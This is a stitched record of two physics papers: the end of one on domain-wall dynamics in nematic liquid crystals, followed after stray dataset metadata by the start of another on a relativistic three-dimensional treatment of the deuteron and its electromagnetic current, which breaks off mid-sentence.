The formulas (16), (18), (31) and (32) give a whole family of domain
walls. To obtain one concrete domain wall solution we have to choose initial
position of the auxiliary surface $S$. Its positions at later times are
determined from Allen-Cahn equation (30). We also have to fix initial
values of the functions $C_1, C_2$, and to find the corresponding solutions
of Eqs.(33), (34). Notice that we are not allowed to choose the
initial profile of the domain wall because the dependence
on the transverse coordinate $s$ is explicitly given. It is known from
formulas (18), (31) and (32).
Any choice of the initial data gives an approximate domain wall solution.
Of course such a choice should not lead to large perturbative corrections
at least in certain finite time interval. Therefore one should require that
at the initial time $\xi_m C_1 \ll 1 , \xi_m^2 C_2 \ll 1, \xi_m K^i_j \ll 1$.
The domain wall is located close to the surface $S$ because for large
$|s|$ the perturbative contributions vanish and the leading term
$2\arctan(e^s)$ is close to one of the vacuum values $0, \pi$.
Let us remark that Eqs.(30), (33) and (34) imply that a planar
domain wall ($K^i_j = 0$) can not move, in contradistinction with
relativistic domain walls for which uniform, inertial motions are possible.
In the presented approach we describe evolution of the domain wall in terms of
the surface $S$ and of the functions $C_1, C_2$. These functions can be
regarded as fields defined on $S$. In some cases Eqs. (30), (33), (34) can
be solved analytically, one can also use numerical methods. Anyway, these
equations are much simpler than the initial Eq.(5).
The presented formalism is invariant with respect to changes of coordinates
$\sigma^1, \sigma^2$ on $S$. In particular, in a vicinity of any point
$\vec{X}$ of $S$ we can choose the coordinates in such a way that
$g_{ik} =\delta_{ik}$ at $\vec{X}$. In these coordinates Eq.(30) has the
form
\begin{equation}
\frac{\gamma_1}{K} v = \frac{1}{R_1} + \frac{1}{R_2},
\end{equation}
where $v$ is the velocity in the direction $\vec{p}$ perpendicular to $S$
at the point $\vec{X}$, and $R_1, R_2$ are the main curvature radia of $S$ at
that point.
As an example, let us consider cylindrical and spherical domain walls.
If $S$ is a straight cylinder of radius $R$ then $R_1 = \infty,
\;R_2 = - R(t)$, $v=\dot{R}$ and Eq.(35) gives
\begin{equation}
R(t) = \sqrt{R^2_0 - \frac{2K}{\gamma_1}(t-t_0)},
\end{equation}
where $R_0$ is the initial radius.
The origin of the Cartesian coordinate frame is located on the symmetry axis
of the cylinder $S$ (which is the z-axis), $\vec{p}$ is the outward normal to
$S$, and $s = (\sqrt{r^2-z^2}-R(t))/\xi_m$, where $r$ is the radial
coordinate in $R^3$. As $\sigma^1, \sigma^2$ we take the usual cylindrical
coordinates $z, \phi$. Equations (33), (34) reduce to
\begin{equation}
\frac{\gamma_1}{K} \partial_t C_1 - \left( \partial^2_z C_1 +\frac{1}{R^2}
\partial^2_{\phi}C_1\right)
- \frac{1}{R^2} C_1 = \frac{\pi^2}{12} \frac{1}{R^3},
\end{equation}
\begin{equation}
\frac{\gamma_1}{K} \partial_t C_2 - \left( \partial^2_z C_2 +\frac{1}{R^2}
\partial^2_{\phi}C_2\right) - \frac{1}{R^2} C_2 = 0.
\end{equation}
If $C_1, C_2$ at the initial time $t_0$ have just constant values
$C_1(0), C_2(0)$ on the cylinder, then
\begin{equation}
C_1(t) = \frac{\pi^2}{12 R(t)} \ln(R_0/R(t)) + \frac{R_0}{R(t)} C_1(0), \;\;
C_2(t) = \frac{R_0}{R(t)} C_2(0).
\end{equation}
General solutions of Eqs.(37), (38) can be
found by splitting $C_1, C_2$ into Fourier modes, but we shall not present
them here.
The case of spherical domain wall is quite similar. Now $S$ is a sphere of
radius $R$ and $R_1=R_2 = - R$, $ v = \dot{R}$. Equation (35) gives
\begin{equation}
R(t) = \sqrt{R^2_0 - \frac{4K}{\gamma_1}(t-t_0)},
\end{equation}
Now the origin is located at the center of the sphere,
$s = (r - R(t))/\xi_m$,
and $\vec{p}$ is the outward normal to $S$. As $\sigma^k$ we take the usual
spherical coordinates. Then, Eqs.(33), (34) can be written in the form
\begin{equation}
\frac{\gamma_1}{K} \partial_t C_1 - \frac{1}{R^2}\left(\frac{1}{\sin\theta}
\partial_{\theta}(\sin\theta \partial_{\theta}C_1) + \frac{1}{\sin^2\theta}
\partial^2_{\phi}C_1 \right) - \frac{2}{R^2}C_1 = \frac{\pi^2}{6}
\frac{1}{R^3},
\end{equation}
and
\begin{equation}
\frac{\gamma_1}{K} \partial_t C_2 - \frac{1}{R^2}\left(\frac{1}{\sin\theta}
\partial_{\theta}(\sin\theta \partial_{\theta}C_2) + \frac{1}{\sin^2\theta}
\partial^2_{\phi}C_2 \right) - \frac{2}{R^2}C_2 = 0.
\end{equation}
General solution of these equations can be obtained by expanding $C_1, C_2$
into spherical harmonics. In the particular case when $C_1, C_2$ are constant
on the sphere $S$ the solutions $C_k(t)$ have the same form (39) as in the
previous case except that now $R(t)$ is given by formula (40).
In the both cases our approximate formulas are expected to be meaningful
as long as $R(t)/\xi_m \gg 1$.
Because we know the transverse profile of the domain wall, we can express
the total free energy $F$ by geometric characteristics of the domain wall.
One should insert our
approximate solution for $\Theta$ in formulas (2) and (3) for ${\cal F}_e$
and ${\cal F}_m$, respectively, and to perform integration over $s$. The
volume element $d^3x$ is taken in the form
\[
d^3x = \xi_m \sqrt{G} d^2\sigma ds.
\]
For simplicity, let us consider curved domain walls for which
\[
C_1= 0 = C_2
\]
at the time $t_0$. Straightforward calculation gives
\[
F = - \frac{K}{2}\frac{V}{\xi_m^2} + \frac{2K}{\xi_m} |S| \;\;\;\;\;\;\;\;\;
\]
\begin{equation}
- \frac{\pi^2}{6} K \xi_m \int d^2\sigma \sqrt{g} (\frac{1}{R_1^2}
+\frac{1}{R_2^2} - \frac{1}{R_1R_2}) + \mbox{terms of the order}\;\xi_m^3,
\end{equation}
where $|S|$ denotes the area of the surface $S$, and $V$ is the total volume
of the liquid crystalline sample. The first term on the
r.h.s. of this formula is just a bulk term which appears because the smallest
value of the magnetic free energy density has been chosen to be equal to
$-K/(2\xi_m^2)$. The proper domain wall contribution starts from the second
term. This term gives the main contribution of the domain wall to $F$. One can
think about the coresponding constant free energy $2K/\xi_m$ per unit area.
The third term on the r.h.s. of formula (43) represents
the first perturbative correction. It is of the order $(\xi_m/R_i)^2$ when
compared with the main term, and within the region of validity of our
perturbative scheme it is small. One can easily show that this term is
negative or zero. Hence, it slightly diminishes the total free energy.
In this sense, the domain walls have negative rigidity --- bending them
without stretching (i.e., with $|S|$ kept constant) diminishes the free
energy.
\section{Remarks}
We would like to add several remarks about the expansion in width
and the approximate domain wall solutions it yields.
\noindent 1. In the presented approach dynamics of the curved domain wall
in the three dimensional space is described in terms of the comoving surface
$S$ and of the functions $C_k$, $k \leq 1$, defined on $S$. The profile of
the domain wall has been explicitly expressed by these functions, by
the transverse coordinate $\xi$, and by the geometric characteristics of $S$.
The surface $S$ and the functions $C_k$ obey equations (30), (33), (34) which
do not contain $\xi$. In particular cases these equations can be solved
analytically, and in general one can look for numerical solutions. Such
numerical analysis is much simpler than it would be in the case of the
initial equation (5) for the angle $\Theta$, precisely because one
independent variable has been eliminated.
\noindent 2. We have used $\xi_m$ as a formal expansion parameter. This may
seem unsatisfactory because it is a
dimensionful quantity, hence it is hard to say whether its value is small
or large. What really matters is smallness of the corrections
$\xi_m \Theta_1,\; \xi_m^2 \Theta_2$. This is the case if
$\xi_m C_1 \ll 1, \; \xi_m^2 C_2 \ll 1$ and $\xi_m K^i_j \ll 1$, as it follows
from formulas (31) and (32).
\noindent 3. Notice that an assumption that $S$ coincides with the core
for all times in general would not be compatible with the expansion in width.
If we assume that $C_1 = 0 = C_2$ at certain initial time $t_0$, Eq.(33)
implies that $C_1 \neq 0$ at later times (unless the r.h.s. of it happens to
vanish).
Then, it follows from formulas (16), (18) and (31) that $\Theta \neq \pi/2$
at $s=0$, that is on $S$.
\noindent 4. In the present work we have neglected effects which could come
from perturbations of the exponentially small tails of the domain wall.
For example, consider a domain wall in the form of infinite
straight cylinder flattened from two opposite sides. Its front and rear flat
sides have zero curvatures, and according to Eq.(35) they do not move.
In our approximations the domain wall shrinks from the sides where the mean
curvature $1/R_1 + 1/R_2$ does not vanish. Now, in reality the front and
rear parts interact with each other. This interaction is exponentially small
only if the two flat parts are far from each other. We have neglected it
altogether assuming the $2\arctan(e^s)$ asymptotics at large $s$. In this
sense, our approximate solution takes into account only the effects of
curvature.
\noindent 5. Finally, let us mention that the dynamics of domain walls in
nematic liquid crystals can also be investigated with the help of another
approximation scheme called the polynomial approximation. In the first
paper \cite{11} it has been applied to a cylindrical domain wall, and in the
second one to a planar soliton. Comparing the two approaches, the
polynomial approximation is much cruder than the expansion in width.
It also contains more arbitrariness, e. g., in choosing concrete form of
boundary conditions at $|s| \rightarrow \infty$. On the other hand, that
method is much simpler. It can be useful for rough estimates.
| 2024-02-18T23:40:13.449Z | 1998-11-30T13:09:45.000Z | algebraic_stack_train_0000 | 1,726 | 6,227 |
|
proofpile-arXiv_065-8463 | \section{Introduction}
A number of the experiments being performed at the Thomas Jefferson
National Accelerator Facility (TJNAF) involve the elastic and
inelastic scattering of electrons off the deuteron at space-like
momentum transfers of the order of the nucleon mass. In building
theoretical models of these processes, relativistic kinematics and
dynamics would seem to be called for. Much theoretical effort has
been spent constructing relativistic formalisms for the two-nucleon
bound state that are based on an effective quantum field theory
lagrangian. If the usual hadronic degrees of freedom appear in the
lagrangian then this strategy is essentially a logical extension of
the standard nonrelativistic treatment of the two-nucleon system.
Furthermore, regardless of the momentum transfer involved, it is
crucial that a description of the deuteron be used which incorporates
the consequences of electromagnetic gauge invariance. Minimally this
means that the electromagnetic current constructed for the deuteron
must be conserved.
Of course, the two-nucleon bound state can be calculated and a
corresponding conserved deuteron current constructed using
non-relativistic $NN$ potentials which are fit to the $NN$ scattering
data. This approach has met with considerable success. (For some
examples of this program see Refs.~\cite{Ad93,Wi95}.) Our goal here is
to imitate such calculations---and, we hope, their success!---in a
relativistic framework. To do this we construct an $NN$ interaction,
place it in a relativistic scattering equation, and then fit the
parameters of our interaction to the $NN$ scattering data. We then
calculate the electromagnetic form factors of the deuteron predicted
by this $NN$ model. By proceeding in this way we hope to gain
understanding of the deuteron electromagnetic form factors in a model
in which relativistic effects, such as relativistic kinematics,
negative-energy states, boost effects, and relativistic pieces of the
electromagnetic current, are explicitly included at all stages of the
calculation.
This program could be pursued using a four-dimensional formalism based
on the Bethe-Salpeter equation. Indeed, pioneering calculations of
electron-deuteron scattering using Bethe-Salpeter amplitudes were
performed by Zuilhof and Tjon almost twenty years
ago~\cite{ZT80,ZT81}. However, despite increases in computer power
since this early work the four-dimensional problem is still a
difficult one to solve. Since the $NN$ interaction is somewhat
phenomenological ultimately it is not clear that one gains greatly in
either dynamics or understanding by treating the problem
four-dimensionally. Therefore, instead we will employ a
three-dimensional formalism that incorporates what we believe are the
important dynamical effects due to relativity at the momentum
transfers of interest.
We will use a three-dimensional (3D) formalism that, in principle, is
equivalent to the four-dimensional Bethe-Salpeter formalism. This
approach has been developed and applied in
Refs.~\cite{PW96,PW97,PW98}. In this paper we will focus on the
calculation of elastic electron-deuteron scattering. Here we review
the formalism for relativistic bound states and show how to construct
the corresponding electromagnetic current. Calculations of elastic
electron-deuteron scattering are performed both in the impulse
approximation and with some meson-exchange currents included. The
results for the observables $A$, $B$ and $T_{20}$ are presented.
Many other 3D relativistic treatments of the deuteron dynamics which
are similar in spirit to that pursued here exist (see for instance
Refs.~\cite{vO95,Ar80}). Of these, our work is closest to that of
Hummel and Tjon~\cite{HT89,HT90,HT94}. However, in that work
approximations were employed for ingredients of the analysis, such as
the use of wave functions based on the 3D quasipotential propagator of
Blankenbecler-Sugar~\cite{BbS66} and Logunov-Tavkhelidze~\cite{LT63},
approximate boost operators, and an electromagnetic current which only
approximately satisfies current conservation. Calculations of elastic
electron-deuteron scattering also were performed by Devine and Wallace
using a similar approach to that pursued here~\cite{WD94}. Here we
extend these previous analyses by use of our systematic 3D formalism.
In this way we can incorporate retardations into the interaction and
also use a deuteron electromagnetic current that is specifically
constructed to maintain the Ward-Takahashi identites.
The paper is organized as follows. In Section~\ref{sec-Section2} we
explain our reduction from four to three dimensions. In
Section~\ref{sec-Section3} we present a four-dimensional equation
which is a modified version of the ladder Bethe-Salpeter equation.
This modified equation has the virtue that it, unlike the ladder BSE,
incorporates the correct one-body limit. By applying our
three-dimensional reduction technique to this four-dimensional
equation we produce an equation which has the correct one-body limit and
contains the correct physics of negative-energy states. In
Section~\ref{sec-Section4} we explain the various potentials that are
used in calculations of deuteron wave functions. These can be divided
into two classes: instant potentials, and potentials that include
meson retardation. Within either of these classes versions of the
potentials are constructed that do and do not include the effects of
negative-energy states, in order to display the role played by such
components of the deuteron wave function. Section~\ref{sec-Section5}
discusses our 3D reduction of the electromagnetic current that
maintains current conservation. This completes the laying out of a
consistent formalism that includes the effects of relativity
systematically, has the correct one-body limits, and maintains current
conservation. In Section~\ref{sec-Section6} we apply this machinery to
the calculation of electron-deuteron scattering both in the impulse
approximation and when corrections due to some meson-exchange currents
are included. Finally, discussion and conclusions are presented in
Section~\ref{sec-Section7}.
\section{The reduction to three dimensions}
\label{sec-Section2}
The Bethe-Salpeter equation,
\begin{equation}
T=K + K G_0 T,
\label{eq:BSE}
\end{equation}
for the four-dimensional $NN$ amplitude $T$ provides a theoretical
description of the deuteron which incorporates relativity.
Here $K$ is the Bethe-Salpeter kernel, and $G_0$ is the
free two-nucleon propagator. In a strict quantum-field-theory
treatment, the kernel $K$ includes the infinite set of two-particle
irreducible $NN \rightarrow NN$ Feynman graphs.
For the two-nucleon system an application of the full effective
quantum field theory of nucleons and mesons is impractical and
perhaps, since hadronic degrees of freedom are not fundamental,
inappropriate. In other words, the Bethe-Salpeter formalism may serve
as a theoretical framework within which some relativistic effective
interaction may be developed. But, if the $NN$ interaction is only an
effective one, then it would seem to be equally appropriate to develop
the relativistic effective interaction within an equivalent
three-dimensional formalism which is obtained from the
four-dimensional Bethe-Salpeter formalism via some systematic
reduction technique.
One straightforward way to reduce the Bethe-Salpeter equation to three
dimensions is to approximate the kernel $K$ by an instantaneous
interaction $K_{\rm inst}$. For example, if $q=(q_0,\bf q)$ is the
relative four-momentum of the two nucleons then
\begin{equation}
K(q)=\frac{1}{q^2 - \mu^2} \qquad \rightarrow \qquad
K({\bf q})=-\frac{1}{{\bf q}^2 + \mu^2}.
\end{equation}
This, admittedly uncontrolled, approximation, yields from the Bethe-Salpeter
equation the Salpeter equation:
\begin{equation}
T_{\rm inst}=K_{\rm inst} + K_{\rm inst} \langle G_0 \rangle T_{\rm inst},
\label{eq:Salpeter}
\end{equation}
where the three-dimensional Salpeter propagator $\langle G_0 \rangle$ is
obtained by integrating over the time-component of relative momentum,
\begin{equation}
\langle G_0 \rangle=\int \frac{dp_0}{2 \pi} G_0(p;P).
\end{equation}
Throughout this paper we denote the integration over the zeroth
component of relative momenta, which is equivalent to consideration of
an equal-time Green's function, by angled brackets. We shall consider
only spin-half particles, and so
\begin{equation}
\langle G_0 \rangle=\frac{\Lambda_1^+ \Lambda_2^+}{E - \epsilon_1
- \epsilon_2} - \frac{\Lambda_1^- \Lambda_2^-}{E + \epsilon_1
+ \epsilon_2};
\label{eq:aveG0}
\end{equation}
where $\Lambda^{\pm}$ are related to projection operators onto
positive and negative-energy states of the Dirac equation, $E$ is the
total energy, and $\epsilon_i=({\bf p}_i^2 + m_i^2)^{1/2}$. Note that
for spin-half particles, this propagator $\langle G_0 \rangle$ is not
invertible.
In order to systematize this kind of 3D reduction one must split the
4D kernel $K$ into two parts. One of these, $K_1$, is to be understood
as a three-dimensional interaction in the sense that it does not
depend on the zeroth component of relative four momentum~\footnote {Of
course, this is not a covariant reduction, but covariance can be
maintained by a suitable generalization of this idea~\cite{PW97}.}.
We then seek to choose this $K_1$ such that the 3D amplitude $T_1$
defined by
\begin{equation}
T_1=K_1 + K_1 \langle G_0 \rangle T_1,
\label{eq:3Dscatt}
\end{equation}
has the property that
\begin{equation}
\langle G_0 \rangle T_1 \langle G_0 \rangle=\langle G_0 T G_0 \rangle.
\end{equation}
It is straightforward to demonstrate that such a $K_1$ is defined by
the coupled equations:
\begin{equation}
K_1 = \langle G_0 \rangle ^{-1} \langle G_0 K {\cal G} \rangle
\langle G_0 \rangle ^{-1} ,
\label{eq:K1}
\end{equation}
which is three-dimensional, and
\begin{equation}
{\cal G} = G_0 + G_0 (K - K_1) {\cal G},
\label{eq:<G0>}
\end{equation}
which is four dimensional. The $K_1$ of Eq.~(\ref{eq:K1}) does this by
ensuring that
\begin{equation}
\langle {\cal G} \rangle=\langle G_0 \rangle.
\label{eq:calGeq}
\end{equation}
The formalism is systematic in the sense that, given a perturbative
expansion for the 4D kernel, $K$, a perturbative expansion for the 3D
kernel, $K_1$, can be developed. At second order in the coupling this gives:
\begin{equation}
K_1^{(2)}=\langle G_0 \rangle^{-1} \langle G_0 K^{(2)} G_0 \rangle
\langle G_0 \rangle^{-1}.
\label{eq:K12}
\end{equation}
In $++ \rightarrow ++$ states this is just the usual energy-dependent
one-particle-exchange interaction of time-ordered perturbation theory,
but with relativistic kinematics, i.e. ignoring spin and isospin:
\begin{equation}
K_1^{(2)}=\frac{g^2}{2 \omega}\left[\frac{1}{E^+ - \epsilon_1 -
\epsilon_2' - \omega} + (1 \leftrightarrow 2)\right],
\end{equation}
where $\omega$ is the on-shell energy of the exchanged particle. Note
that $\langle G_0 \rangle$ must be invertible in order for the 3D
reduction to be consistent. (Similar connections between three and
four-dimensional approaches are discussed in
Refs.~\cite{LT63,Kl53,KL74,BK93B,LA97}.)
Equation~(\ref{eq:3Dscatt}) leads to an equation for the bound-state
vertex function:
\begin{equation}
\Gamma_1 = K_1 \langle G_0 \rangle \Gamma_1,
\label{eq:3Deqn}
\end{equation}
where $\Gamma_1$ is the vertex function in the three-dimensional
theory. The 4D vertex function, $\Gamma$, and the
corresponding 3D one, $\Gamma_1$, are related via
\begin{equation}
G_0 \Gamma = {\cal G}\Gamma_1.
\label{eq:GcalGamma1}
\end{equation}
\section{The one-body limit}
\label{sec-Section3}
As mentioned above, and discussed many years ago by Klein~\cite{Kl53},
the propagator $\langle G_0 \rangle$ is not invertible and therefore
the above reduction is not consistent. We shall show in this section
that this difficulty is connected to the behavior of the
three-dimensional equation in the one-body limit. In this limit we
allow one particle's mass to tend to infinity. We expect that the
amplitude $T_1$ then reduces to that given by the Dirac equation for a
light particle moving in the static field of the heavy particle. In
fact, this does not happen unless we include an infinite number of
graphs in the kernel of the integral equation Eq.~(\ref{eq:Salpeter}).
In fact, if a scattering equation with a kernel which contains only a
finite number of graphs is to possess the correct one-body limit, two
distinct criteria must be satisfied. First the 3D propagator should
limit to the one-body propagator for one particle (the Dirac
propagator in this case) as the other particle's mass tends to
infinity. Second, as either particle's mass tends to infinity, the
equation should become equivalent to one in which the interaction,
$K_1$, is static.
Equation~(\ref{eq:Salpeter})'s lack of either of these properties
stems from Eq.~(\ref{eq:BSE}) not having the correct one-body limit if
any kernel which does not include the infinite set of crossed-ladder
graphs is chosen~\cite{Gr82}. Solution of Eq.~(\ref{eq:BSE}) with such
a kernel is impractical in the $NN$ system. Nevertheless, the
contributions of crossed-ladder graphs to the kernel may be included
in an integral equation for $T$ by using a 4D integral equation for
$K$, the kernel of Eq.~(\ref{eq:BSE})
\begin{equation}
K = U + U G_C K.
\label{eq:U}
\end{equation}
Once $G_C$ is defined this equation defines a reduced kernel $U$ in
terms of the original kernel $K$. The propagator $G_C$ is chosen so
as to separate the parts of the kernel $K$ that are necessary to
obtain the one-body limit from the parts that are not. $U$ may then
be truncated at any desired order without losing the one-body limits.
The following 4D equation for the t-matrix is thus equivalent to
Eqs.~(\ref{eq:BSE}) and (\ref{eq:U}),
\begin{equation}
T = U + U (G_0 + G_C) T.
\label{eq:4DETampl}
\end{equation}
We can now remedy the defects of our previous 3D reduction. Applying
the same 3D reduction used above to Eq.~(\ref{eq:4DETampl}) gives:
\begin{equation}
T_1 = U_1 + U_1 \langle G_0 + G_C \rangle T_1,
\label{eq:3DETampl}
\end{equation}
where the 3D propagator is
\begin{eqnarray}
\langle G_0 + G_C \rangle&=&\frac{ \Lambda_1^+ \Lambda_2^+}{{P^0}^+
- \epsilon_1 - \epsilon_2} - \frac{ \Lambda_1^+ \Lambda_2^-}{2
\kappa_2^0 - {P^0}^+ + \epsilon_1 + \epsilon_2} \nonumber\\
&-& \frac{ \Lambda_1^- \Lambda_2^+}{{P^0}^- - 2 \kappa_2^0 + \epsilon_1
+ \epsilon_2} - \frac{ \Lambda_1^- \Lambda_2^-}{{P^0}^- +
\epsilon_1 + \epsilon_2},
\label{eq:aveG0GCgeneral}
\end{eqnarray}
and $\kappa_2^0$ is a parameter that enters through the construction
of $G_C$. This three-dimensional propagator was derived by Mandelzweig
and Wallace with the choice $\kappa_2^0 = P^0/2 - (m_1^2 -
m_2^2)/(2P^0)$~\cite{MW87,WM89}. With $\kappa_2^0$ chosen in this way
$\langle G_0 + G_C \rangle$ has the correct one-body limits as either
particle's mass tends to infinity and has an invertible form. The
kernel $U_1$ is defined by Eqs.~(\ref{eq:K1}) and (\ref{eq:calGeq})
with the replacements $G_0 \rightarrow G_0 + G_C$, $K \rightarrow U$,
and $K_1 \rightarrow U_1$.
Here we are interested in the scattering of particles of equal mass
and so we make a different choice for $\kappa_2^0$. Specifically,
\begin{equation}
\kappa_2^0 = \frac{P^0 - \epsilon_1 + \epsilon_2}{2}.
\label{eq:kappachoice}
\end{equation}
This form avoids the appearance of unphysical singularities when
electron-deuteron scattering is calculated~\cite{PW98}. It yields a
two-body propagator:
\begin{equation}
\langle G_0 + G_C \rangle=\frac{ \Lambda_1^+ \Lambda_2^+}{{P^0}^+
- \epsilon_1 - \epsilon_2} - \frac{ \Lambda_1^+ \Lambda_2^-}{2
\epsilon_2} - \frac{ \Lambda_1^- \Lambda_2^+}{2 \epsilon_1} -
\frac{ \Lambda_1^- \Lambda_2^-}{{P^0}^- + \epsilon_1 + \epsilon_2},
\label{eq:aveG0GC}
\end{equation}
which is consistent with that required by low-energy theorems for
Dirac particles in scalar and vector fields~\cite{Ph97}. Another way
of saying this is to realize that if we compare the the $++
\rightarrow ++$ piece of the amplitude
\begin{equation}
V_1 \langle G_0 + G_C \rangle V_1
\end{equation}
to the amplitude obtained at fourth order in the full 4D field theory
then the contribution of negative-energy states agrees at leading
order in $1/M$~\cite{PW98}.
For bound states the argument of the previous section leads to the 3D
equation:
\begin{equation}
\Gamma_1=U_1 \langle G_0 + G_C \rangle \Gamma_1.
\label{eq:3DET}
\end{equation}
Equation (\ref{eq:3DET}) is a bound-state equation which incorporates
relativistic effects and the physics of negative-energy states.
For instance, fig.~\ref{fig-Zgraph} is one example of a
graph which is included if Eq.~(\ref{eq:3DET}), even if only the
lowest-order kernel $U_1^{(2)}$ is used, because of our careful treatment
of the one-body limit.
\begin{figure}[h]
\centerline{\BoxedEPSF{fig1.eps scaled 350}}
\caption{One example of a Z-graph which is included in our
3D equation (\ref{eq:3DET}).}
\label{fig-Zgraph}
\end{figure}
\section{Results for the deuteron}
\label{sec-Section4}
To calculate observables in the deuteron we now consider two types of
kernels $U_1$, both of which are calculated within the framework
of a one-boson exchange model for the $NN$ interaction:
\begin{enumerate}
\item $U_1=U_{\rm inst}$, the instantaneous interaction.
\item A kernel $U_1^{(2)}$ which is a retarded interaction. This is
obtained from Eq.~(\ref{eq:K12}) by the substitutions $K_1^{(2)}
\rightarrow U_1^{(2)}$ and $G_0 \rightarrow G_0 + G_C$.
\end{enumerate}
These interactions are used in a two-body equation with the full ET
Green's function given by Eq.~(\ref{eq:3DET}), and also in an equation
in which only the $++$ sector is retained. For the instant
interaction, we follow the practice of Devine and Wallace~\cite{WD94}
and switch off couplings between the $++$ and $--$ sectors, and
between the $+-$ and $-+$ sectors. A partial justification of this
rule follows from an analysis of the static limit of our 3D retarded
interaction.
The mesons in our one-boson exchange model are the $\pi(138)$, the
$\sigma(550)$, the $\eta(549)$, the $\rho(769)$, the $\omega(782)$,
and the $\delta(983)$. All the parameters of the model, except for
the $\sigma $ coupling, are taken directly from the Bonn-B fit to the
$NN$ phase shifts~\cite{Ma89}---which is a fit performed using a
relativistic wave equation and relativistic propagators for the
mesons. The $\sigma$ coupling is varied so as to achieve the correct
deuteron binding energy for each interaction considered. Of course, we
should refit the parameters of our $NN$ interaction using our
different scattering equations. However, for a first estimate of the
importance of negative-energy states and retardation we adopt this
simpler approach to constructing the interaction. Work on improving
the $NN$ interaction model is in progress~\cite{PW98B}.
Once a particular interaction is chosen, the integral equation
(\ref{eq:3DET}) is solved for the bound-state energy. In each
calculation, the $\sigma$ coupling is adjusted to get the correct
deuteron binding energy, producing the results (accurate to three
significant figures) given in Table~\ref{table-sigmacoupling}. The
value given for the instant calculation with positive-energy states
alone is that found in the original Bonn-B fit. In all other cases the
$\sigma$ coupling must be adjusted to compensate for the inclusion of
retardation, the effects of negative-energy states, etc. We believe
that this adjustment of the scalar coupling strength is sufficient to
get a reasonable deuteron wave function. The static properties of this
deuteron are very similar to those of a deuteron calculated with the
usual Bonn-B interaction.
With the bound-state wave function in the center-of-mass frame has
been determined in this fashion, it is a simple matter to solve the
integral equation (\ref{eq:3DET}) in any other frame. We choose to
calculate electron-deuteron scattering in the Breit frame. The
interaction is recalculated in the Breit frame for a given $Q^2$, and
then the integral equation is solved with this new interaction.
Because the formalism we use for reducing the four-dimensional
integral equation to three dimensions is {\it not} Lorentz invariant
there is a violation of Lorentz invariance in this calculation.
Estimations of the degree to which Lorentz invariance is violated are
displayed in Ref.~\cite{PW98}.
\begin{table}[htbp]
\caption{Sigma coupling required to produce the correct deuteron binding
energy in the four different models under consideration here.}
\label{table-sigmacoupling}
\begin{center}
\begin{tabular}{|c|c|c|}
\hline
{\bf Interaction} & {\bf States included} & {\bf $g_\sigma^2/4 \pi$} \\
\hline
Instant & ++ & 8.08 \\ \hline
Retarded & ++ & 8.39 \\ \hline
Instant & All & 8.55 \\ \hline
Retarded & All & 8.44 \\ \hline
\end{tabular}
\end{center}
\end{table}
\section{Current conservation}
\label{sec-Section5}
\subsection{Currents in the three-dimensional formalism}
\label{sec-3Dcurrents}
As discussed in the Introduction, we now want to compare the predictions
of this formalism with experimental data gained in electron scattering
experiments. In calculating the interaction of the electron
with the hadronic bound state it is crucial to derive a
3D reduction of the electromagnetic current which is consistent with
the reduction of the scattering equation we have chosen to use here.
The current in the full four-dimensional formalism is obtained by
coupling photons everywhere on the right-hand side of
Eq.~(\ref{eq:BSE}). This produces the following gauge-invariant
result for the photon's interaction with the bound state:
\begin{eqnarray}
{\cal A}_\mu&=&\bar{\Gamma}(P') G_0(P') J_\mu G_0 (P) \Gamma(P) \nonumber\\
&+& \bar{\Gamma}(P') G_0(P') K_\mu^\gamma G_0 (P) \Gamma(P),
\label{eq:gi4damp}
\end{eqnarray}
where $P$ and $P'$ are the initial and final total four-momenta of the
deuteron bound state. Here $J_\mu$ contains the usual one-body
currents and $K_\mu^\gamma$ represents two-body contributions which
are necessary for maintaining the Ward-Takahashi identities. All
integrals implicitly are four-dimensional. The connection to the
three-dimensional amplitude, $\Gamma_1$, obtained from
Eq.~(\ref{eq:3DET}) is made by inserting Eq.~(\ref{eq:GcalGamma1})
into Eq.~(\ref{eq:gi4damp}), giving
\begin{equation}
{\cal A}_\mu=\bar{\Gamma}_1(P') \langle {\cal G}(P')
\left[J_\mu + K_\mu^\gamma \right] {\cal G}(P) \rangle \Gamma_1(P).
\label{eq:Amu}
\end{equation}
Once the effective operator $\langle {\cal G}(P') \left[J_\mu +
K_\mu^\gamma \right] {\cal G}(P) \rangle$ is calculated the
expression (\ref{eq:Amu}) involves only three-dimensional integrals.
Since ${\cal G}$ is an infinite series in $K-K_1$ this result would
not be much help on its own. But, given a result for $\Gamma_1$
obtained by systematic expansion of $K_1$, the amplitude ${\cal
A}_\mu$ can be analogously expanded in a way that maintains current
conservation. $K_1$ as defined by Eq.~(\ref{eq:K1}) is an infinite
series and the condition (\ref{eq:calGeq}) is imposed order-by-order
in the expansion in $K-K_1$ defines $K_1$ to some finite order. The
question is: Does a corresponding 3D approximation for the current
matrix element (\ref{eq:Amu}) exist that maintains the Ward-Takahashi
identities of the theory? {\it It turns out that the current matrix
element (\ref{eq:Amu}) is conserved if ${\cal G} (J_\mu +
K^\gamma_\mu) {\cal G}$ on the right-hand side of Eq.~(\ref{eq:Amu})
is expanded to a given order in the coupling constant and the kernel
$K_1$ used to define $\Gamma_1$ is obtained from
Eq.~(\ref{eq:calGeq}) by truncation at the same order in the
coupling constant.}
This is done by splitting the right-hand side of Eq.~(\ref{eq:Amu})
into two pieces, one due to the one-body current $J_\mu$, and one due
to the two-body current $K^\gamma_\mu$. If $K_1$ has been truncated at
lowest order---i.e., $K_1=K_1^{(2)}$---then, in the $J_\mu$ piece, we
expand the $\cal G$s and retain terms up to the same order in
$K^{(2)}-K_1^{(2)}$. A piece from the two-body current, in which we
write ${\cal G}=G_0$, is added to this. That is, we define our
second-order approximation to ${\cal A}_\mu$, ${\cal A}_\mu^{(2)}$, by
\begin{eqnarray}
{\cal A}^{(2)}_\mu&=&\bar{\Gamma}_1(P') \langle G^\gamma_{0 \mu}
\rangle \Gamma_1(P) \nonumber \\ &+& \bar{\Gamma}_1(P') \langle G_0(P') (K^{(2)}(P')-K^{(2)}_1(P'))
G^\gamma_{0 \mu} \rangle \Gamma_1(P)
\nonumber\\
&+& \bar{\Gamma}_1(P') \langle G^{\gamma}_{0 \mu} (K^{(2)}(P)-K^{(2)}_1(P)) G_0(P) \rangle
\Gamma_1(P)
\nonumber\\
&+& \bar{\Gamma}_1(P') \langle G_0(P') K^{\gamma (2)}_\mu G_0(P) \rangle
\Gamma_1(P),
\label{eq:A2mu}
\end{eqnarray}
where ${G_0^\gamma}_\mu=G_0(P') J_\mu G_0(P)$. It can now be shown
that if Eq.~(\ref{eq:calGeq}) expanded to second order defines
$K_1^{(2)}$, the corresponding amplitude for electromagnetic
